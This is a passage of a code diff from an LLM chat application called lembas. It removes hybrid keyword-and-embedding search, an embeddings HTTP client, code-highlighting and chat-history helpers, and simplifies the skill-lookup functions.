if not hits:
|
||||
return []
|
||||
order = {hit.id: position for position, hit in enumerate(hits)}
|
||||
|
||||
@@ -1,207 +0,0 @@
|
||||
"""Finding things: keywords, meaning, and the two fused.
|
||||
|
||||
`fts.search_ids` was already the one seam every store searches through. This
|
||||
sits beside it and keeps that true — the four stores still call one function and
|
||||
still get ids back, and what changed is what is behind it.
|
||||
|
||||
## Reciprocal rank fusion, and why not a weight
|
||||
|
||||
Two rankings have to become one, and their scores are not comparable: bm25 is a
|
||||
negative number whose scale depends on the corpus, cosine is 0..1. Normalising
|
||||
them onto a common scale means picking a constant, and that constant is a knob
|
||||
nobody can tune without a labelled test set they do not have.
|
||||
|
||||
RRF uses the **ranks** and not the scores: `1 / (K + rank)`, summed. It has one
|
||||
constant, `K`, it is famously insensitive to it, and it degrades to exactly one
|
||||
of the two lists when the other is empty — which is what makes "no embedding
|
||||
model configured" mean the keyword search, unchanged, with no branch anywhere
|
||||
that says so.
|
||||
|
||||
## The query is embedded by the caller, not here
|
||||
|
||||
`search` is synchronous, because every store's `search()` is and every one of
|
||||
them is called from both a route and a tool runner. Embedding is an HTTP request.
|
||||
So a caller that can await gets the query vector first and passes it in; one that
|
||||
cannot passes nothing and gets keywords. `embed_query` is the async half, and
|
||||
being able to answer `None` for every "no" is what keeps that from being a branch
|
||||
at each call site.
|
||||
|
||||
## Visibility is still somebody else's job
|
||||
|
||||
Both halves return ids, and both are scored across *everything* — the filter is
|
||||
applied to the row query afterwards, in each store, through
|
||||
`services/sharing.py`. That order is deliberate and is the same one the
|
||||
full-text path has always used: filtering afterwards is what makes it impossible
|
||||
for a hit on somebody else's record to leak, even as a count.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import Chunk
|
||||
from lembas.services.library import chunks as chunk_service
|
||||
from lembas.services.library.fts import SearchHit, fts_query, search_ids
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# The one constant in reciprocal rank fusion. 60 is what the original paper used
|
||||
# and what everything since has copied; the method's whole appeal is that the
|
||||
# result barely moves for anything in the tens. It is not a tuning knob and is
|
||||
# deliberately not a setting -- a number nobody can evaluate is a number nobody
|
||||
# should be asked about.
|
||||
RRF_K = 60
|
||||
|
||||
# How many chunks are scored before they are collapsed to records. Larger than
|
||||
# the number of records wanted, because one long document can own several of the
|
||||
# best chunks and would otherwise crowd everything else out of the answer.
|
||||
CHUNK_MULTIPLIER = 6
|
||||
|
||||
|
||||
def embeddable(db: DBSession) -> bool:
|
||||
from lembas.services.library import indexing
|
||||
|
||||
return indexing.enabled(db)
|
||||
|
||||
|
||||
def worker_for(db: DBSession):
|
||||
"""The configured embedder, resolved while a session is open.
|
||||
|
||||
Split from the awaiting half deliberately. A caller that must not hold a
|
||||
database session across an HTTP request -- a tool runner, which is about to
|
||||
open its own -- resolves here, closes, and awaits `embed_with`. One that
|
||||
already holds a request's session and is content to keep it can use
|
||||
`embed_query` instead.
|
||||
"""
|
||||
from lembas.services.library import indexing
|
||||
|
||||
return indexing.embedder(db)
|
||||
|
||||
|
||||
async def embed_with(worker, needle: str) -> list[float] | None:
|
||||
"""The query as a vector, or None.
|
||||
|
||||
None for every "no": no model configured, an empty query, an endpoint that
|
||||
is down. Each of them means the same thing to the caller — search by
|
||||
keywords — so none of them is an error, and a search that quietly stops
|
||||
being semantic is far better than one that 500s because a model server was
|
||||
restarting.
|
||||
"""
|
||||
from lembas.services.llm import embeddings as embeddings_service
|
||||
from lembas.services.llm.openai_client import LLMError
|
||||
|
||||
if worker is None or not (needle or "").strip():
|
||||
return None
|
||||
try:
|
||||
vectors = await embeddings_service.embed(worker.endpoint, worker.model_id, [needle])
|
||||
except LLMError as exc:
|
||||
log.info("could not embed a query: %s", exc)
|
||||
return None
|
||||
return vectors[0] if vectors else None
|
||||
|
||||
|
||||
async def embed_query(db: DBSession, needle: str) -> list[float] | None:
|
||||
"""`worker_for` and `embed_with`, for a caller happy to hold its session."""
|
||||
return await embed_with(worker_for(db), needle)
|
||||
|
||||
|
||||
def semantic_ids(
|
||||
db: DBSession, kind: str, vector: list[float], *, limit: int = 20
|
||||
) -> list[SearchHit]:
|
||||
"""Record ids whose best chunk is closest to `vector`, best first.
|
||||
|
||||
A brute-force scan, and that is the right answer at this scale: a library of
|
||||
ten thousand chunks is forty megabytes of float32 and a few million
|
||||
multiply-adds, which is milliseconds. A real index is a later change behind
|
||||
this same call, which is why the signature says nothing about how.
|
||||
|
||||
**A record scores as its best chunk, not its average.** One paragraph that
|
||||
answers the question is what makes a document worth returning; averaging
|
||||
would rank a long document about something else above a short one that says
|
||||
exactly the thing, because most of the long one is not about anything.
|
||||
|
||||
Chunks whose width does not match the query's are skipped. That is a change
|
||||
of embedding model with a rebuild still pending, and scoring across two
|
||||
spaces produces a confident wrong answer rather than a missing one.
|
||||
"""
|
||||
if not vector:
|
||||
return []
|
||||
width = len(vector)
|
||||
rows = db.execute(
|
||||
select(Chunk.resource_id, Chunk.vector, Chunk.dims).where(Chunk.resource_type == kind)
|
||||
).all()
|
||||
|
||||
best: dict[str, float] = {}
|
||||
for resource_id, blob, dims in rows:
|
||||
if int(dims or 0) != width:
|
||||
continue
|
||||
stored = chunk_service.unpack(blob, int(dims))
|
||||
if not stored:
|
||||
continue
|
||||
score = chunk_service.dot(vector, stored)
|
||||
key = str(resource_id)
|
||||
if score > best.get(key, -2.0):
|
||||
best[key] = score
|
||||
|
||||
ordered = sorted(best.items(), key=lambda pair: pair[1], reverse=True)
|
||||
return [SearchHit(id=key, rank=score) for key, score in ordered[: max(1, limit)]]
|
||||
|
||||
|
||||
def fuse(*rankings: list[SearchHit], limit: int = 20) -> list[SearchHit]:
|
||||
"""Reciprocal rank fusion of any number of rankings.
|
||||
|
||||
The returned `rank` is the fused score, and it is **larger for better**,
|
||||
which is the opposite of bm25's convention. Nothing downstream reads it --
|
||||
every caller uses the order — but it is worth saying out loud rather than
|
||||
leaving somebody to infer it from a negative number that is no longer there.
|
||||
"""
|
||||
scores: dict[str, float] = {}
|
||||
for ranking in rankings:
|
||||
for position, hit in enumerate(ranking):
|
||||
scores[hit.id] = scores.get(hit.id, 0.0) + 1.0 / (RRF_K + position + 1)
|
||||
ordered = sorted(scores.items(), key=lambda pair: pair[1], reverse=True)
|
||||
return [SearchHit(id=key, rank=score) for key, score in ordered[: max(1, limit)]]
|
||||
|
||||
|
||||
def search(
|
||||
db: DBSession,
|
||||
index: str,
|
||||
needle: str,
|
||||
*,
|
||||
kind: str = "",
|
||||
vector: list[float] | None = None,
|
||||
limit: int = 20,
|
||||
) -> list[SearchHit]:
|
||||
"""Ids matching `needle`, keywords and meaning fused.
|
||||
|
||||
With no `vector` this is `fts.search_ids` and nothing else — the same call,
|
||||
the same results, in the same order. That is what makes an instance with no
|
||||
embedding model byte-for-byte what it always was, and it is asserted by a
|
||||
test rather than left as a claim.
|
||||
"""
|
||||
keyword = search_ids(db, index, needle, limit=limit)
|
||||
if not vector or not kind:
|
||||
return keyword
|
||||
meaning = semantic_ids(db, kind, vector, limit=limit * CHUNK_MULTIPLIER)
|
||||
if not meaning:
|
||||
return keyword
|
||||
if not keyword and not fts_query(needle):
|
||||
# Nothing typed that FTS could match — a query of pure punctuation, or
|
||||
# one whose every word is a separator. The semantic side still has an
|
||||
# answer, and fusing a list with nothing is that list.
|
||||
return meaning[:limit]
|
||||
return fuse(keyword, meaning, limit=limit)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"CHUNK_MULTIPLIER",
|
||||
"RRF_K",
|
||||
"embed_query",
|
||||
"embeddable",
|
||||
"fuse",
|
||||
"search",
|
||||
"semantic_ids",
|
||||
]
|
||||
@@ -23,14 +23,13 @@ from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import re
|
||||
from collections.abc import Iterable
|
||||
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, CHUNK_SKILL, Skill, SkillRevision, User
|
||||
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, Skill, SkillRevision, User
|
||||
from lembas.services import sharing
|
||||
from lembas.services.library import retrieval
|
||||
from lembas.services.library.fts import search_ids
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
@@ -67,85 +66,28 @@ def get(db: DBSession, skill_id: str, user: User | None) -> Skill | None:
|
||||
|
||||
|
||||
def by_name(db: DBSession, name: str, user: User | None) -> Skill | None:
|
||||
"""Look one up the way the model refers to it.
|
||||
|
||||
Scoped to what this person can **see**, which is theirs plus anything
|
||||
shared with them -- correct for `skill_get` and `skill_edit`, where a
|
||||
skill somebody shared is exactly what the model is reaching for.
|
||||
|
||||
It is the wrong question for "is this name taken?"; see `owned_by_name`.
|
||||
"""
|
||||
"""Look one up the way the model refers to it."""
|
||||
if user is None:
|
||||
return None
|
||||
return db.scalar(visible(db, user).where(Skill.name == slugify(name)))
|
||||
|
||||
|
||||
def owned_by_name(db: DBSession, name: str, owner: User) -> Skill | None:
|
||||
"""One of *this person's own* skills by name.
|
||||
|
||||
The uniqueness check used `by_name`, which is scoped to what is visible --
|
||||
so a skill somebody shared with you took that name out of your library.
|
||||
Sharing a curated skill with a team is the intended use of `library.share`,
|
||||
and doing it silently reserved the name for everyone it reached: creating
|
||||
your own was refused with "a skill called 'weekly-report' already exists.
|
||||
Edit it instead", naming a row you cannot edit, because sharing grants
|
||||
reading only. The model's `skill_create` got the same dead end.
|
||||
|
||||
The table's constraint is `(owner_id, name)`, so the question the check
|
||||
should have been asking was always this one. `documents.create_base` next
|
||||
door asks it correctly.
|
||||
"""
|
||||
return db.scalar(
|
||||
select(Skill).where(Skill.owner_id == owner.id, Skill.name == slugify(name))
|
||||
)
|
||||
|
||||
|
||||
def enabled_for(
|
||||
db: DBSession, user: User | None, *, exclude: Iterable[str] = ()
|
||||
) -> list[Skill]:
|
||||
"""Skills that should appear in the index, oldest first for a stable order.
|
||||
|
||||
`exclude` is what one chat has switched off by name -- a narrowing of what
|
||||
the library already allows, never a widening of it.
|
||||
"""
|
||||
def enabled_for(db: DBSession, user: User | None) -> list[Skill]:
|
||||
"""Skills that should appear in the index, oldest first for a stable order."""
|
||||
if user is None:
|
||||
return []
|
||||
hidden = {slugify(name) for name in exclude}
|
||||
rows = db.scalars(
|
||||
return list(
|
||||
db.scalars(
|
||||
visible(db, user)
|
||||
.where(Skill.enabled.is_(True))
|
||||
.order_by(Skill.name)
|
||||
.limit(MAX_INDEX_SKILLS + len(hidden))
|
||||
.limit(MAX_INDEX_SKILLS)
|
||||
)
|
||||
)
|
||||
return [skill for skill in rows if skill.name not in hidden][:MAX_INDEX_SKILLS]
|
||||
|
||||
|
||||
def count_enabled(db: DBSession, user: User | None, *, exclude: Iterable[str] = ()) -> int:
|
||||
"""How many skills are available here at all.
|
||||
|
||||
Zero is what withdraws `skill_get` and `skill_edit`: reading and improving
|
||||
are meaningless with nothing to read, and a model told to "read one with
|
||||
skill_get" above a list that is not there spends a round finding out.
|
||||
"""
|
||||
return len(enabled_for(db, user, exclude=exclude))
|
||||
|
||||
|
||||
def search(
|
||||
db: DBSession,
|
||||
user: User | None,
|
||||
needle: str,
|
||||
*,
|
||||
limit: int = 10,
|
||||
vector: list[float] | None = None,
|
||||
) -> list[Skill]:
|
||||
"""Skills matching `needle` that this user may see, best match first.
|
||||
|
||||
`vector` is the query already embedded, or None. It comes from the caller
|
||||
rather than being worked out here because this is synchronous and embedding
|
||||
is an HTTP request -- see `services/library/retrieval.py`. None means the
|
||||
keyword search exactly as it always was.
|
||||
"""
|
||||
hits = retrieval.search(db, INDEX, needle, kind=CHUNK_SKILL, vector=vector, limit=limit * 4)
|
||||
def search(db: DBSession, user: User | None, needle: str, *, limit: int = 10) -> list[Skill]:
|
||||
hits = search_ids(db, INDEX, needle, limit=limit * 4)
|
||||
if not hits:
|
||||
return []
|
||||
order = {hit.id: position for position, hit in enumerate(hits)}
|
||||
@@ -182,7 +124,7 @@ def create(
|
||||
"A skill name must be two or more letters, numbers or hyphens, "
|
||||
"such as 'weekly-report'."
|
||||
)
|
||||
if owned_by_name(db, slug, owner) is not None:
|
||||
if by_name(db, slug, owner) is not None:
|
||||
raise SkillError(f"A skill called {slug!r} already exists. Edit it instead.")
|
||||
if not description.strip():
|
||||
raise SkillError(
|
||||
@@ -257,9 +199,9 @@ def delete(db: DBSession, skill: Skill) -> None:
|
||||
db.commit()
|
||||
|
||||
|
||||
def index_block(db: DBSession, user: User | None, *, exclude: Iterable[str] = ()) -> str:
|
||||
def index_block(db: DBSession, user: User | None) -> str:
|
||||
"""The one-line-per-skill listing that goes into the prompt."""
|
||||
skills = enabled_for(db, user, exclude=exclude)
|
||||
skills = enabled_for(db, user)
|
||||
if not skills:
|
||||
return ""
|
||||
return "\n".join(f"- {skill.name}: {skill.description}" for skill in skills)
|
||||
|
||||
@@ -1,144 +0,0 @@
|
||||
"""Turning text into vectors, against an OpenAI-shaped `/v1/embeddings`.
|
||||
|
||||
The same reasoning as the chat and audio clients: plain httpx rather than an
|
||||
SDK, because the target is llama.cpp, Ollama, LM Studio, Infinity or vLLM at
|
||||
least as often as it is api.openai.com. They agree about the request and
|
||||
disagree politely about the response, so this is tolerant about what comes back
|
||||
and strict about what it hands on.
|
||||
|
||||
**Batched, because the cost is the round trip.** A hundred chunks one at a time
|
||||
against a local endpoint is a hundred model loads' worth of latency for work
|
||||
that fits in six requests. The batch size is a setting, because "how many at
|
||||
once" is a property of the far side rather than of this code.
|
||||
|
||||
**Dimensions are discovered, never declared.** Nobody should have to look up
|
||||
that bge-m3 is 1024 and nomic-embed-text is 768, and an instance that changes
|
||||
model must not silently compare vectors from two different spaces --
|
||||
`services/library/indexing.py` records the width beside every vector and
|
||||
refuses to score across a mismatch.
|
||||
|
||||
Normalisation happens here, once, on the way out. Cosine similarity between two
|
||||
unit vectors is their dot product, so normalising at write time turns every
|
||||
later comparison into a multiply-and-add instead of two square roots per pair.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import math
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
|
||||
from lembas.services.llm.openai_client import (
|
||||
Endpoint,
|
||||
LLMError,
|
||||
describe_http_error,
|
||||
wrap_transport_error,
|
||||
)
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# Longer than a chat request's, because a batch of sixteen chunks against a
|
||||
# cold local endpoint includes loading the model.
|
||||
TIMEOUT = 120.0
|
||||
|
||||
|
||||
def normalise(vector: list[float]) -> list[float]:
|
||||
"""A unit vector, or the input unchanged when it has no length.
|
||||
|
||||
A zero vector is what an endpoint returns for empty input, and dividing by
|
||||
its norm is the one arithmetic error this path can make. It is left as it
|
||||
is: scoring it against anything gives zero, which is the honest answer.
|
||||
"""
|
||||
length = math.sqrt(sum(value * value for value in vector))
|
||||
if length <= 0:
|
||||
return vector
|
||||
return [value / length for value in vector]
|
||||
|
||||
|
||||
def _vectors_in(payload: Any) -> list[list[float]]:
|
||||
"""The embeddings out of a response, whatever shape it arrived in.
|
||||
|
||||
OpenAI's own answer is `{"data": [{"embedding": [...], "index": 0}]}`, and
|
||||
the index is honoured rather than assumed: nothing in the specification
|
||||
promises the order, and a provider that sorts differently would silently
|
||||
pair every chunk with somebody else's vector — which produces a search that
|
||||
works and is wrong, the worst failure this whole feature can have.
|
||||
"""
|
||||
if not isinstance(payload, dict):
|
||||
raise LLMError("The embedding endpoint returned something unreadable.")
|
||||
data = payload.get("data")
|
||||
if not isinstance(data, list) or not data:
|
||||
raise LLMError("The embedding endpoint returned no vectors.")
|
||||
|
||||
ordered: list[tuple[int, list[float]]] = []
|
||||
for position, entry in enumerate(data):
|
||||
if not isinstance(entry, dict):
|
||||
raise LLMError("The embedding endpoint returned no vectors.")
|
||||
raw = entry.get("embedding")
|
||||
if not isinstance(raw, list) or not raw:
|
||||
raise LLMError("The embedding endpoint returned an empty vector.")
|
||||
index = entry.get("index")
|
||||
at = int(index) if isinstance(index, int) else position
|
||||
ordered.append((at, [float(value) for value in raw]))
|
||||
ordered.sort(key=lambda pair: pair[0])
|
||||
return [vector for _, vector in ordered]
|
||||
|
||||
|
||||
async def embed(
|
||||
endpoint: Endpoint, model_id: str, texts: list[str], *, timeout: float = TIMEOUT
|
||||
) -> list[list[float]]:
|
||||
"""One request. Returns a unit vector per input, in the order given.
|
||||
|
||||
Raises `LLMError` for everything -- a missing model, an endpoint that does
|
||||
not implement embeddings at all, a transport failure -- because every caller
|
||||
treats them the same way: the index is left as it was and the search falls
|
||||
back to keywords. Nothing here is worth a partial answer.
|
||||
"""
|
||||
if not texts:
|
||||
return []
|
||||
body = {"model": model_id, "input": texts}
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=timeout) as client:
|
||||
response = await client.post(
|
||||
endpoint.url("/embeddings"), headers=endpoint.headers(), json=body
|
||||
)
|
||||
# raise_for_status, then translate. `describe_http_error` takes the
|
||||
# exception rather than the response, which is what every other
|
||||
# client here hands it.
|
||||
response.raise_for_status()
|
||||
payload = response.json()
|
||||
except httpx.HTTPStatusError as exc:
|
||||
raise LLMError(describe_http_error(exc)) from exc
|
||||
except httpx.HTTPError as exc:
|
||||
raise wrap_transport_error(exc, endpoint) from exc
|
||||
except ValueError as exc:
|
||||
raise LLMError("The embedding endpoint did not return JSON.") from exc
|
||||
|
||||
vectors = _vectors_in(payload)
|
||||
if len(vectors) != len(texts):
|
||||
# Not recoverable by guessing. A response with fewer vectors than inputs
|
||||
# would pair chunk three's text with chunk four's vector from there on,
|
||||
# for the life of the index.
|
||||
raise LLMError(
|
||||
f"Asked for {len(texts)} embeddings and got {len(vectors)}."
|
||||
)
|
||||
widths = {len(vector) for vector in vectors}
|
||||
if len(widths) != 1:
|
||||
raise LLMError("The embedding endpoint returned vectors of different widths.")
|
||||
return [normalise(vector) for vector in vectors]
|
||||
|
||||
|
||||
async def probe(endpoint: Endpoint, model_id: str) -> int:
|
||||
"""How wide this model's vectors are, by asking for one.
|
||||
|
||||
Used by the admin page's Test button and by nothing on the request path.
|
||||
There is no endpoint that reports it, so the only honest way to find out is
|
||||
to embed something.
|
||||
"""
|
||||
vectors = await embed(endpoint, model_id, ["lembas"], timeout=60.0)
|
||||
return len(vectors[0])
|
||||
|
||||
|
||||
__all__ = ["TIMEOUT", "embed", "normalise", "probe"]
|
||||
@@ -68,19 +68,6 @@ class Endpoint:
|
||||
base = f"{base}/v1"
|
||||
return f"{base}/{path.lstrip('/')}"
|
||||
|
||||
def root_url(self, path: str) -> str:
|
||||
"""A URL at the *server's* root rather than under `/v1`.
|
||||
|
||||
llama-server's own endpoints -- `/props` is the one that matters here --
|
||||
sit beside the OpenAI-compatible surface, not inside it. A base URL may
|
||||
be written either way (`http://host:8080` or `.../v1`), so the suffix is
|
||||
stripped rather than assumed absent.
|
||||
"""
|
||||
base = self.base_url.rstrip("/")
|
||||
if base.endswith("/v1"):
|
||||
base = base[: -len("/v1")]
|
||||
return f"{base}/{path.lstrip('/')}"
|
||||
|
||||
def headers(self) -> dict[str, str]:
|
||||
headers = {"Content-Type": "application/json", **self.extra_headers}
|
||||
# Local endpoints frequently need no key at all; sending an empty
|
||||
@@ -90,30 +77,6 @@ class Endpoint:
|
||||
return headers
|
||||
|
||||
|
||||
async def fetch_chat_template(endpoint: Endpoint) -> str:
|
||||
"""The model's own Jinja chat template, from llama-server's `/props`.
|
||||
|
||||
The one place the truth about a model's accepted values is actually
|
||||
written down: `/props` returns `chat_template` verbatim, and that template
|
||||
is what raises when it meets a `reasoning_effort` it does not know.
|
||||
|
||||
Returns "" rather than raising for anything that is not a llama-server --
|
||||
OpenAI, vLLM and the rest have no such route, and "this endpoint cannot
|
||||
tell us" is a normal answer here, not a failure.
|
||||
"""
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=10.0) as client:
|
||||
response = await client.get(
|
||||
endpoint.root_url("props"), headers=endpoint.headers()
|
||||
)
|
||||
response.raise_for_status()
|
||||
payload = response.json()
|
||||
except (httpx.HTTPError, ValueError, json.JSONDecodeError):
|
||||
return ""
|
||||
template = payload.get("chat_template") if isinstance(payload, dict) else ""
|
||||
return template if isinstance(template, str) else ""
|
||||
|
||||
|
||||
def describe_http_error(exc: httpx.HTTPStatusError) -> str:
|
||||
"""Turn an upstream error response into something worth reading.
|
||||
|
||||
|
||||
@@ -19,7 +19,7 @@ import nh3
|
||||
from markdown_it import MarkdownIt
|
||||
from pygments import highlight
|
||||
from pygments.formatters import HtmlFormatter
|
||||
from pygments.lexers import get_lexer_by_name, get_lexer_for_filename, guess_lexer
|
||||
from pygments.lexers import get_lexer_by_name, guess_lexer
|
||||
from pygments.util import ClassNotFound
|
||||
|
||||
# Class-based highlighting; the colours come from theme tokens in chat.css, so
|
||||
@@ -95,43 +95,6 @@ def _render_fence(tokens, idx, _options, _env) -> str:
|
||||
)
|
||||
|
||||
|
||||
def highlight_code(text: str, filename: str = "") -> str:
|
||||
"""A whole file, class-highlighted, for the canvas panel to read.
|
||||
|
||||
Here rather than in a module of its own because `markdown.py` is where
|
||||
pygments lives and `_FORMATTER` is already configured: a second formatter
|
||||
would mean a second set of class names and a second thing to theme, and the
|
||||
`.pg-*` rules would then be right about code fences and wrong about files.
|
||||
|
||||
Pygments' `HtmlFormatter` escapes what it is given, which is what makes this
|
||||
the one call the canvas templates mark `|safe`. The content came off
|
||||
somebody else's disk, so that property is the whole of the argument -- if
|
||||
the lexer cannot be found the text is escaped by hand instead, never passed
|
||||
through.
|
||||
|
||||
Chooses by filename, because that is what the canvas has: a lexer guessed
|
||||
from contents is confidently wrong on short files, and there is no fence
|
||||
info string here to read a language out of.
|
||||
"""
|
||||
if not text:
|
||||
return ""
|
||||
|
||||
lexer = None
|
||||
if filename:
|
||||
try:
|
||||
lexer = get_lexer_for_filename(filename, stripall=False)
|
||||
except (ClassNotFound, ValueError):
|
||||
lexer = None
|
||||
if lexer is None and len(text) > 200:
|
||||
try:
|
||||
lexer = guess_lexer(text)
|
||||
except (ClassNotFound, ValueError):
|
||||
lexer = None
|
||||
|
||||
body = nh3.clean_text(text) if lexer is None else highlight(text, lexer, _FORMATTER)
|
||||
return f'<pre class="canvas__code"><code>{body}</code></pre>'
|
||||
|
||||
|
||||
@functools.lru_cache(maxsize=1)
|
||||
def _parser() -> MarkdownIt:
|
||||
md = MarkdownIt("commonmark", {"linkify": True, "typographer": False})
|
||||
@@ -157,43 +120,6 @@ def render_markdown(text: str) -> str:
|
||||
)
|
||||
|
||||
|
||||
# A fence opener: three or more backticks or tildes at the start of a line,
|
||||
# optionally indented, with whatever info string follows. Deliberately shallow --
|
||||
# it does not know about lists, block quotes or indented code, and it does not
|
||||
# have to. See `open_fence`.
|
||||
_FENCE = re.compile(r"^ {0,3}(`{3,}|~{3,})[ \t]*(.*)$")
|
||||
|
||||
|
||||
def open_fence(text: str) -> tuple[str, str]:
|
||||
"""The marker and info string of a fence left open, or ``("", "")``.
|
||||
|
||||
A reply is rendered in pieces now -- one per step, split where the model
|
||||
stopped to call a tool -- and a fence opened in one piece and never closed
|
||||
would run to the end of that piece and then leave every later fence in the
|
||||
reply paired up wrongly. `services/steps.py` uses this to close such a fence
|
||||
at the end of its own segment and reopen it at the start of the next.
|
||||
|
||||
Deliberately not a second Markdown parser. It has to be right about one
|
||||
thing: a model that opened a fence and then called a tool. Where it is
|
||||
unsure it says "no fence", which renders exactly as the whole-text version
|
||||
always did.
|
||||
"""
|
||||
marker = ""
|
||||
info = ""
|
||||
for line in text.splitlines():
|
||||
found = _FENCE.match(line)
|
||||
if found is None:
|
||||
continue
|
||||
fence, rest = found.group(1), found.group(2).strip()
|
||||
if not marker:
|
||||
marker, info = fence, rest
|
||||
elif fence[0] == marker[0] and len(fence) >= len(marker) and not rest:
|
||||
# A closer is the same character, at least as long, and carries no
|
||||
# info string. Anything else inside an open fence is just text.
|
||||
marker, info = "", ""
|
||||
return marker, info
|
||||
|
||||
|
||||
# A mention is `@` followed by a run of non-space, claimed only at the start of
|
||||
# the text or after whitespace. That last part is the whole rule: without it
|
||||
# every email address in a message becomes a highlighted file reference, which
|
||||
|
||||
@@ -1,156 +0,0 @@
|
||||
"""Messages: one long-running conversation per person.
|
||||
|
||||
Signal-shaped rather than chat-shaped. There is exactly one of these per
|
||||
account, it is never titled, never filed and never deleted, and it is meant to
|
||||
run for years — which is the whole difficulty, because a conversation that never
|
||||
ends cannot all be sent to a model.
|
||||
|
||||
**What is stored and what is used are different things, and only the second is
|
||||
bounded.** Every turn is kept, for ever, and scrolling up shows all of them
|
||||
exactly as they were written. What reaches the model is the most recent
|
||||
`LIVE_CHUNK` turns and nothing before them.
|
||||
|
||||
**Nothing is folded into text and nothing is deleted**, and that is a
|
||||
deliberate reading of "compressed and history only". The visible conversation
|
||||
would be identical either way, so the only thing destroying the older turns
|
||||
would buy is disk — against which it is irreversible, it loses every attachment
|
||||
and tool call in the folded range, and it contradicts the rule this codebase
|
||||
already holds for compaction: *hiding turns is not deleting them*. Bounding the
|
||||
request achieves the whole of what the feature needs. If the rows ever do need
|
||||
folding, it is one function against this same boundary and the pages above it do
|
||||
not change.
|
||||
|
||||
The consequence is worth stating plainly rather than discovering: **a Messages
|
||||
conversation is infinite on screen and finite in the request.** Past the live
|
||||
chunk the model genuinely does not see what was said, and it is told so.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from sqlalchemy import func, select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import KIND_MESSAGES, Chat, Message, User
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# How many turns reach the model. The "latest chunk", and deliberately larger
|
||||
# than a page of history: it is the part that has to be enough to hold a
|
||||
# conversation in, while the rest only has to be readable.
|
||||
LIVE_CHUNK = 40
|
||||
|
||||
# How many older turns one scroll-up fetches. Bigger than the live chunk because
|
||||
# reading back is cheap -- no tokens, no request, just rows.
|
||||
HISTORY_PAGE = 100
|
||||
|
||||
|
||||
def for_user(db: DBSession, user: User) -> Chat:
|
||||
"""This person's Messages conversation, made if it is not there yet.
|
||||
|
||||
The second deliberate exception to "chats are created lazily", and for a
|
||||
different reason than a task chat's: a schedule can post in here before
|
||||
anybody has ever opened the page, and `wake_chat` needs a row to write to.
|
||||
Get-or-create rather than a startup sweep, so an account that never opens
|
||||
Messages never grows one.
|
||||
"""
|
||||
from lembas.services import chat as chat_service
|
||||
|
||||
existing = db.scalars(
|
||||
select(Chat)
|
||||
.where(Chat.user_id == user.id, Chat.kind == KIND_MESSAGES)
|
||||
.order_by(Chat.created_at)
|
||||
).first()
|
||||
if existing is not None:
|
||||
return existing
|
||||
|
||||
# `default_model` answers with the *pair* -- the model id and the connection
|
||||
# it was reached through -- because a chat stores both and resolving the
|
||||
# second later would pick whichever connection happens to offer the id.
|
||||
# Unpacked rather than assigned, which is the mistake this comment exists to
|
||||
# stop being made again: assigning the tuple straight to `model_id` writes a
|
||||
# tuple into a String column and SQLite refuses the insert.
|
||||
chosen = chat_service.default_model(db, user)
|
||||
model_id, connection_id = chosen if chosen else ("", None)
|
||||
|
||||
conversation = Chat(
|
||||
user_id=user.id,
|
||||
kind=KIND_MESSAGES,
|
||||
title="Messages",
|
||||
# Titling never runs on this one: there is no first exchange to name and
|
||||
# the name is fixed. Set so nothing downstream has to special-case it.
|
||||
title_generated=True,
|
||||
model_id=model_id,
|
||||
connection_id=connection_id,
|
||||
)
|
||||
db.add(conversation)
|
||||
db.commit()
|
||||
return conversation
|
||||
|
||||
|
||||
def count(db: DBSession, chat: Chat) -> int:
|
||||
return int(
|
||||
db.scalar(select(func.count()).select_from(Message).where(Message.chat_id == chat.id))
|
||||
or 0
|
||||
)
|
||||
|
||||
|
||||
def live_messages(db: DBSession, chat: Chat, *, limit: int = LIVE_CHUNK) -> list[Message]:
|
||||
"""The most recent turns, oldest first.
|
||||
|
||||
Fetched newest-first and reversed rather than offset from the start: an
|
||||
offset would have to be recomputed from a count on every request, and would
|
||||
be wrong the moment a turn arrived between the two queries.
|
||||
"""
|
||||
newest = db.scalars(
|
||||
select(Message)
|
||||
.where(Message.chat_id == chat.id)
|
||||
.order_by(Message.created_at.desc(), Message.id.desc())
|
||||
.limit(limit)
|
||||
).all()
|
||||
return list(reversed(newest))
|
||||
|
||||
|
||||
def older_than(
|
||||
db: DBSession, chat: Chat, cursor: Message, *, limit: int = HISTORY_PAGE
|
||||
) -> list[Message]:
|
||||
"""The page of turns immediately before `cursor`, oldest first.
|
||||
|
||||
The comparison is done in SQL with an `id` tie-breaker, exactly as
|
||||
`thread_tail` does going the other way. That is not decoration: under a bare
|
||||
`<`, a row sharing the cursor's microsecond can never be reached, and a
|
||||
message that cannot be scrolled back to is a message that is gone.
|
||||
"""
|
||||
rows = db.scalars(
|
||||
select(Message)
|
||||
.where(
|
||||
Message.chat_id == chat.id,
|
||||
(Message.created_at < cursor.created_at)
|
||||
| ((Message.created_at == cursor.created_at) & (Message.id < cursor.id)),
|
||||
)
|
||||
.order_by(Message.created_at.desc(), Message.id.desc())
|
||||
.limit(limit)
|
||||
).all()
|
||||
return list(reversed(rows))
|
||||
|
||||
|
||||
def has_more_before(db: DBSession, chat: Chat, cursor: Message) -> bool:
|
||||
"""Whether the sentinel should be rendered again above a page.
|
||||
|
||||
Asked separately rather than by fetching one extra row, because the answer
|
||||
is needed *after* the page has been reversed and the extra row would have to
|
||||
be trimmed off the wrong end.
|
||||
"""
|
||||
return (
|
||||
